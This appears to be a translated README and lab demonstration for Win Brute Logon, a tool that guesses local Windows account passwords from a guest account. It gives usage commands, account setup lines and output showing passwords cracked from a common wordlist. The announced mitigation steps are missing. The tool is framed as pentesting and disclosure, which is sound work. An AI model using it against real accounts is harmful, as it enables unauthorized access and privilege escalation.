PEMBERITAHUAN 1: Kami sangat senang mengumumkan bahwa alat kami saat ini telah diangkut ke versi PowerShell. Ini berarti bahwa pengguna sekarang dapat mengakses dan menggunakan alat ini langsung dari baris perintah PowerShell, membuatnya lebih nyaman dan efisien untuk digunakan. Kami percaya bahwa versi baru ini akan sangat menguntungkan pengguna kami dan meningkatkan pengalaman mereka dengan alat ini. Terima kasih atas dukungan Anda yang berkelanjutan dan kami harap Anda menikmati versi PowerShell yang baru: https://github.com/darkcodersc/power-wrute-logon
PEMBERITAHUAN 2: Kami baru-baru ini mengetahui bahwa Microsoft telah mengaktifkan kebijakan penguncian akun secara default dalam versi modern dan terkini dari Windows. Kebijakan ini membantu mengamankan sistem dengan mengunci akun setelah sejumlah upaya login yang gagal. Meskipun ini adalah tindakan keamanan yang menguntungkan, ia membuat bukti konsep (POC) tidak efisien pada sistem ini.
Tanggal rilis: 2020-05-14
Target: Windows XP ke versi Windows 10 terbaru (1909)
Kelemahan Lokasi: LogonUserA , LogonUserW , CreateProcessWithLogonA , CreateProcessWithLogonW
WinBruteLogon.exe -u <username> -w <wordlist_file>
type <wordlist_file> | WinBruteLogon.exe -u <username> -
Win Brute Logon dirancang untuk mensimulasikan serangan brute-force pada akun Microsoft dengan menebak sejumlah besar kombinasi kata sandi dalam waktu singkat. Hal ini memungkinkan Pentester untuk menguji postur keamanan sistem mereka dan menilai pertahanan mereka terhadap serangan brute-force. Alat ini mengeksploitasi kurangnya mekanisme penguncian akun, yang merupakan kelemahan umum dalam banyak sistem (sebelum penguncian akun diaktifkan secara default pada Windows 11). Dengan mencoba menebak kata sandi dari suatu akun, alat ini dapat membantu pentester mengidentifikasi dan mengatasi kerentanan dalam langkah -langkah keamanan mereka. Itu harus digunakan secara bertanggung jawab dan dalam batas -batas hukum.
Untuk demonstrasi ini, kami akan mengatur versi baru Windows 10 pada mesin virtual atau fisik. Setelah mesin diatur, masuk sebagai administrator. Selanjutnya, buat dua akun lokal yang berbeda: satu akun administrator dan satu akun pengguna reguler. Harap dicatat bahwa meskipun kami akan menggunakan akun tamu untuk demo, bukti konsep ini (POC) ini tidak terbatas pada akun tamu. Ini dapat digunakan dari akun atau grup apa pun, termasuk tamu, pengguna biasa, dan pengguna admin.
net user darkcodersc /add
net user darkcodersc trousers (celana panjang adalah kata sandi)
net localgroup administrators darkcodersc /add
net user HackMe /add
net user HackMe ozlq6qwm (ozlq6qwm adalah kata sandi)
net user GuestUser /add
net localgroup users GuestUser /delete
net localgroup guests GuestUser /add
Dalam kasus saya, trousers dan ozlq6qwm ada di Seclist: https://github.com/danielmiessler/seclists/blob/master/passwords/common-credentials/10k-most-common.txt
Untuk memulai demonstrasi, keluar dari akun administrator atau restart mesin dan masuk ke akun tamu. Kemudian, tempatkan POC yang dapat dieksekusi di lokasi di mana Anda memiliki akses sebagai pengguna tamu.
Penggunaan: WinBruteLogon.exe -v -u <username> -w <wordlist_file>
-v opsional, merancang mode verbose.
Secara default, nama domain adalah nilai yang ditunjuk oleh %USERDOMAIN% env var. Anda dapat menentukan nama khusus dengan opsi -d
darkcodersc (Administrator) prompt (tamu)> WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt
Tunggu beberapa detik untuk melihat hasil berikut:
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=2260, handle=364
[INFO] New "TWorker" Thread created with id=3712, handle=532
[DONE] Done.
[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=2260, handle=364) Thread successfully terminated.
[INFO] "TWorkers"(id=3712, handle=532) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
HackMe (Pengguna Reguler) prompt (tamu)> WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt
Tunggu beberapa detik untuk melihat hasil berikut:
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=5748, handle=336
[INFO] New "TWorker" Thread created with id=4948, handle=140
[DONE] Done.
[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=5748, handle=336) Thread successfully terminated.
[INFO] "TWorkers"(id=4948, handle=140) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
"Dalam skenario dunia nyata, jika penyerang mendapatkan akses ke akun pengguna priviled rendah, mereka mungkin dapat memecahkan kata sandi pengguna yang lebih istimewa dan meningkatkan hak istimewa mereka. Untuk mengurangi risiko ini, ada beberapa langkah yang dapat diambil:
Untuk mengimplementasikan kebijakan penguncian keamanan (yang tidak diaktifkan secara default), ikuti langkah -langkah ini:
Harap dicatat bahwa kebijakan penguncian tidak berlaku untuk akun administrator. Dalam hal ini, perlindungan terbaik untuk akun administrator (jika diaktifkan) adalah mengatur kata sandi yang sangat kompleks.
Sebuah laporan yang merinci kelemahan ini telah dikirim ke tim keamanan Microsoft. Mereka harus mempertimbangkan untuk mengaktifkan kebijakan penguncian akun secara default. "
(UPDATE 2022): Penguncian akun akhirnya diaktifkan secara default.